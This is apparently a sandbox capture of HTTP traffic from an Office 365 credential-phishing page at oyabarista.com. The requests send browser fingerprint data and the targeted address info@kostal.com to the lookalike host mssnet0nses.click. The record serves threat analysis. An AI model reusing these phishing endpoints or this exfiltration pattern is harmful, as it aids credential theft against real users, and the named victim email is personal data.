                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:09 UTC843INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:42:09 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 1
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hp7u94DOtCUQE2bTPXuUhFCQ%2FlJALBwp3yKxl5ugU2PWx7It6Bb1qTGDPc4iBJzy7SQVrFIdPNrqxCRa0wBHXdLlrt0Tw33axI6tZS0UimymHjLYrbc4YBDol1EipWo%2FS2leWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f307a0d0f84-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84826&min_rtt=83225&rtt_var=19965&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1264&delivery_rate=34697&cwnd=252&unsent_bytes=0&cid=f3093494d689bba3&ts=796&x=0"
                                                        2025-03-27 13:42:09 UTC1INData Raw: 31
                                                        Data Ascii: 1


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        109192.168.2.549862172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:09 UTC450OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrhC-&sid=7qMH1QkTS0k0NzOqAAfQ HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:09 UTC795INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:42:09 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DRJsBdSJ0UoMLp8Vee8mQCYwLTewVbl8iCcDTkB8LCSqxkv%2BQGa3OPH5unB88wzvMfOL1WsWueBr%2FbeQSkl8RH0VeviFZWbG4nz6YUXtYIkypo2RBm5bynrSVd7CMApg31wLAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f3389a1be82-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83904&min_rtt=83787&rtt_var=17851&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1022&delivery_rate=36329&cwnd=252&unsent_bytes=0&cid=4247c4722ee07efe&ts=304&x=0"
                                                        2025-03-27 13:42:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        110192.168.2.549852104.21.70.2324436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:09 UTC1041OUTPOST /n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com HTTP/1.1
                                                        Host: www.oyabarista.com
                                                        Connection: keep-alive
                                                        Content-Length: 147028
                                                        Cache-Control: max-age=0
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://www.oyabarista.com
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:09 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                                                        Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                                                        2025-03-27 13:42:09 UTC16384OUTData Raw: 32 43 25 32 32 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42
                                                        Data Ascii: 2C%22XMLHttpRequest%22%3A%22function+XMLHttpRequest%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22XMLDocument%22%3A%22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B
                                                        2025-03-27 13:42:09 UTC16384OUTData Raw: 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 50 72 65 73 65 72 76 65 41 73 70 65 63 74 52 61 74 69 6f 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69
                                                        Data Ascii: Bnative+code%5D+%7D%22%2C%22SVGAnimatedString%22%3A%22function+SVGAnimatedString%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedRect%22%3A%22function+SVGAnimatedRect%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedPreserveAspectRatio%22%3A%22functi
                                                        2025-03-27 13:42:09 UTC16384OUTData Raw: 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 61 70 74 69 6f 6e 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62
                                                        Data Ascii: 7D%22%2C%22HTMLTableColElement%22%3A%22function+HTMLTableColElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCellElement%22%3A%22function+HTMLTableCellElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCaptionElement%22%3A%22function+HTMLTab
                                                        2025-03-27 13:42:09 UTC16384OUTData Raw: 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 66 72 61 6d 65 73 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 66
                                                        Data Ascii: B+%5Bnative+code%5D+%7D%22%2C%22CSSLayerBlockRule%22%3A%22function+CSSLayerBlockRule%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeywordValue%22%3A%22function+CSSKeywordValue%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeyframesRule%22%3A%22function+CSSKeyf
                                                        2025-03-27 13:42:09 UTC16384OUTData Raw: 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 57 72 69 74 61 62 6c 65 46 69 6c 65 53 74
                                                        Data Ascii: %28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemFileHandle%22%3A%22function+FileSystemFileHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemHandle%22%3A%22function+FileSystemHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemWritableFileSt
                                                        2025-03-27 13:42:09 UTC16384OUTData Raw: 32 25 32 43 25 32 32 54 61 73 6b 53 69 67 6e 61 6c 25 32 32 25 32 43 25 32 32 54 61 73 6b 50 72 69 6f 72 69 74 79 43 68 61 6e 67 65 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 54 61 73 6b 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 32 43 25 32 32 54 61 73 6b 41 74 74 72 69 62 75 74 69 6f 6e 54 69 6d 69 6e 67 25 32 32 25 32 43 25 32 32 53 79 6e 63 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 53 75 62 6d 69 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 4c 69 73 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 52 65 61 64 4f 6e 6c 79 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 25 32 32 25 32 43 25 32 32 53 74 6f 72
                                                        Data Ascii: 2%2C%22TaskSignal%22%2C%22TaskPriorityChangeEvent%22%2C%22TaskController%22%2C%22TaskAttributionTiming%22%2C%22SyncManager%22%2C%22SubmitEvent%22%2C%22StyleSheetList%22%2C%22StyleSheet%22%2C%22StylePropertyMapReadOnly%22%2C%22StylePropertyMap%22%2C%22Stor
                                                        2025-03-27 13:42:09 UTC16384OUTData Raw: 32 63 6c 6f 73 65 25 32 32 25 32 43 25 32 32 63 6f 6e 66 69 72 6d 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 49 6d 61 67 65 42 69 74 6d 61 70 25 32 32 25 32 43 25 32 32 66 65 74 63 68 25 32 32 25 32 43 25 32 32 66 69 6e 64 25 32 32 25 32 43 25 32 32 66 6f 63 75 73 25 32 32 25 32 43 25 32 32 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 25 32 32 25 32 43 25 32 32 67 65 74 53 65 6c 65 63 74 69 6f 6e 25 32 32 25 32 43 25 32 32 6d 61 74 63 68 4d 65 64 69 61 25 32 32 25 32 43 25 32 32 6d 6f 76 65 42 79 25 32 32 25 32 43 25 32 32 6d 6f 76 65 54 6f 25 32 32 25 32 43 25 32 32 6f 70 65 6e 25 32 32 25 32 43 25 32 32 70 6f 73 74 4d 65 73 73 61 67 65 25 32 32 25 32 43 25 32 32 70 72 69 6e 74 25 32 32 25 32 43 25 32 32 70 72 6f 6d 70 74 25 32 32 25 32 43 25 32 32
                                                        Data Ascii: 2close%22%2C%22confirm%22%2C%22createImageBitmap%22%2C%22fetch%22%2C%22find%22%2C%22focus%22%2C%22getComputedStyle%22%2C%22getSelection%22%2C%22matchMedia%22%2C%22moveBy%22%2C%22moveTo%22%2C%22open%22%2C%22postMessage%22%2C%22print%22%2C%22prompt%22%2C%22
                                                        2025-03-27 13:42:09 UTC15956OUTData Raw: 53 74 61 6d 70 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 74 69 6d 65 53 74 61 6d 70 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 6f 6e 74 65 78 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 6f 6e 74 65 78 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 54 61 73 6b 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 54 61 73 6b 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6d 65 6d 6f 72 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 4d 65 6d 6f 72
                                                        Data Ascii: Stamp%22%3A%22function+timeStamp%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22context%22%3A%22function+context%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createTask%22%3A%22function+createTask%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22memory%22%3A%22%5Bobject+Memor


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        111192.168.2.549864172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:09 UTC450OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrhDU&sid=7qMH1QkTS0k0NzOqAAfQ HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:09 UTC833INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:42:09 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wm9%2BxG%2BEQk7XmfM9xqZdGMJmjGi8MAW2cO3bmttbH8wRzt19xoxZ745QUjrYUjSHiH2qgjs7WNFRmbAtX3J9zLicuFnoQ0%2FK%2BLt8TWf5mg8kxNepUaTFw%2Fb9MueVd5aTdYSgEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f36d816c461-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83590&min_rtt=83568&rtt_var=17665&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1022&delivery_rate=36541&cwnd=252&unsent_bytes=0&cid=2f97ed0dabccdf27&ts=303&x=0"
                                                        2025-03-27 13:42:09 UTC47INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a
                                                        Data Ascii: 29{"code":1,"message":"Session ID unknown"}
                                                        2025-03-27 13:42:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        112192.168.2.549866172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:10 UTC567OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrhrx HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:10 UTC941INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:42:10 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mVoWhtfvIbwHwg%2BSjORfQwgfV6K5q3h88XMgyjTIG0Aaju%2BvoEnWFd3kbssU8sXg57pOTVFEoOkWur%2FmPhsDbRbdvTrHPhr0OWvdagpVxQ14wRpnzU2EkuRTu25aZIe2PNMBhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f3ddee7e226-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=86244&min_rtt=84591&rtt_var=20389&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1139&delivery_rate=33992&cwnd=252&unsent_bytes=0&cid=5a898aa7a15ec06a&ts=320&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        113192.168.2.549867172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:11 UTC667OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrhrx HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:11 UTC849INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:42:11 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 118
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OMHTkDUUv%2BFNJJmH8qF%2Fp3r5N0hwQ3N7xc9xAErC%2BEs6uMqwluxTKzATR%2B5xKrur02SIXZshUSXHoAueqowcwoY8ih6RH3jpNl19SDX7P121ayLBYT6bQDAIW2ZQtbWbMJgMKQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f40ed50c411-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83544&min_rtt=83401&rtt_var=17810&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1239&delivery_rate=36456&cwnd=252&unsent_bytes=0&cid=e01acaf80f870b60&ts=321&x=0"
                                                        2025-03-27 13:42:11 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 67 47 45 68 77 6e 5f 36 4c 58 7a 6a 67 69 35 42 41 41 66 54 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                        Data Ascii: 0{"sid":"gGEhwn_6LXzjgi5BAAfT","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        114192.168.2.549869172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:11 UTC593OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNri5g&sid=gGEhwn_6LXzjgi5BAAfT HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:11 UTC943INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:42:11 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q6L%2FmUZVU9WuZzrKwU4G6SXhxxf32EpAbKenCV8K5EAucqmuIxmokrhgo%2F1OQXz61hJO9k0cnC%2B1DN7lHxSdb8JFvc9AdfDZ9w1dNvUwn1jDt1NixdWXOaDqulnTV%2BhZM9yCtg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f441875b9c6-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84417&min_rtt=84324&rtt_var=17932&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1165&delivery_rate=36112&cwnd=252&unsent_bytes=0&cid=fbc6cad588123696&ts=304&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
